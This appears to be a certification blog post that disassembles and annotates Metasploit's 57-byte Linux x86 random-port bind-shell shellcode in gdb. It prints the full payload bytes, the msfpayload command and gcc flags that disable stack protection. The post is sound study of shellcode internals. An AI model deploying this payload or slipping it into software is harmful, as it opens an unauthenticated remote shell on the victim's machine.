Source: SecurityTube
I explain every line which needs explanation; I hope it is explained well enough. If you don't understand something, leave me a comment and I will explain/respond to all questions.
1) We need to generate our payload for the later analysis
msfpayload linux/x86/shell_bind_tcp_random_port C

/*
 * linux/x86/shell_bind_tcp_random_port - 57 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependSetresgid=false, PrependSetregid=false,
 * PrependSetgid=false, PrependChrootBreak=false,
 * AppendExit=false
 */
unsigned char payload[] =
"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x52\x50\x89\xe1\xb0\x66\xb3\x04\xcd\x80\xb0\x66\x43\xcd\x80"
"\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\xcd\x80";

Compilation: gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
(these flags are only there so the test harness can execute the payload from its data buffer under gdb)

Source of the .C code can be found here
To start, I recommend that you check my post about the bind shell.
2) Analyzing with GDB
gdb -q ./shellcode
;-----------------------------------------------------------------------
; linux/x86/shell_bind_tcp_random_port (57 bytes), disassembled in gdb
; ABI:   Linux i386 system calls via int 0x80
;        eax = syscall number, ebx/ecx/edx = args 1..3, result in eax
;        socketcall (0x66) takes ebx = sub-call number and
;        ecx = pointer to an argument array built on the stack
; Flow:  socket() -> listen() -> accept() -> dup2() loop -> execve()
;        There is no bind() between socket() and listen(), so the kernel
;        auto-binds an ephemeral port: that is why the port is "random".
; Note:  the concrete fd values (7, 8) are what this gdb session showed;
;        they depend on which descriptors the host process already had open.
;-----------------------------------------------------------------------
=> 0x0804a040 <+0>:     xor    ebx,ebx              ; ebx = 0
   0x0804a042 <+2>:     mul    ebx                  ; eax = edx = 0 (edx is never written again: NULL envp at execve)
   0x0804a044 <+4>:     mov    al,0x66              ; eax = 102 == socketcall
   0x0804a046 <+6>:     inc    ebx                  ; ebx = 1 == SYS_SOCKET -> int socket(int family, int type, int protocol)
   0x0804a047 <+7>:     push   edx                  ; 0 == protocol (system default for the type); this 0 later NUL-terminates "/bin//sh"
   0x0804a048 <+8>:     push   ebx                  ; 1 == SOCK_STREAM (type)
   0x0804a049 <+9>:     push   0x2                  ; 2 == AF_INET (family)
   0x0804a04b <+11>:    mov    ecx,esp              ; ecx -> {AF_INET, SOCK_STREAM, 0}
   0x0804a04d <+13>:    int    0x80                 ; eax = listening socket fd (7 in this session)
   0x0804a04f <+15>:    push   edx                  ; 0 == backlog
   0x0804a050 <+16>:    push   eax                  ; sockfd
   0x0804a051 <+17>:    mov    ecx,esp              ; ecx -> {sockfd, 0}
   0x0804a053 <+19>:    mov    al,0x66              ; eax = 102 == socketcall
   0x0804a055 <+21>:    mov    bl,0x4               ; ebx = 4 == SYS_LISTEN
   0x0804a057 <+23>:    int    0x80                 ; listen(sockfd, 0); socket was never bound, so the kernel picks the port
   0x0804a059 <+25>:    mov    al,0x66              ; eax = 102 == socketcall
   0x0804a05b <+27>:    inc    ebx                  ; ebx = 5 == SYS_ACCEPT
   0x0804a05c <+28>:    int    0x80                 ; accept(sockfd, NULL, ...) reusing the same array (addr slot is the 0 above sockfd,
                                                    ; addrlen slot is the leftover 2 — presumably ignored since addr is NULL);
                                                    ; blocks until a client connects; eax = client fd (8 here)
   0x0804a05e <+30>:    pop    ecx                  ; ecx = sockfd (7); reused below as the dup2 loop counter
   0x0804a05f <+31>:    xchg   ebx,eax              ; ebx = client fd (8), eax = 5 (discarded)
   0x0804a060 <+32>:    push   0x3f                 ; 63
   0x0804a062 <+34>:    pop    eax                  ; eax = 63 == dup2; loop body: dup2(clientfd, ecx) for ecx = 7 down to 0
                                                    ; (8 iterations), which redirects stdin/stdout/stderr (fds 0-2) to the socket
   0x0804a063 <+35>:    int    0x80                 ; syscall; returns the new fd (ecx) in eax
   0x0804a065 <+37>:    dec    ecx                  ; ecx -= 1
   0x0804a066 <+38>:    jns    0x804a060            ; repeat at <+32> while ecx >= 0; falls through once ecx == -1
   0x0804a068 <+40>:    mov    al,0xb               ; eax = 11 == execve (relies on the last dup2 having returned 0 so the upper bytes of eax are clear)
   0x0804a06a <+42>:    push   0x68732f2f           ; "//sh"
   0x0804a06f <+47>:    push   0x6e69622f           ; "/bin" -> "/bin//sh" on the stack, NUL-terminated by the 0 pushed at <+7>
   0x0804a074 <+52>:    mov    ebx,esp              ; ebx -> "/bin//sh" (filename)
   0x0804a076 <+54>:    inc    ecx                  ; ecx = -1 + 1 = 0 == NULL argv
   0x0804a077 <+55>:    int    0x80                 ; execve("/bin//sh", NULL, NULL); edx is still 0 == NULL envp
   0x0804a079 <+57>:    add    BYTE PTR [eax],al    ; not part of the 57-byte payload: gdb decoding the array's trailing 0x00 bytes
This blog post has been created to complete the requirements of the SecurityTube Linux Assembly Expert certification:
SLAE-513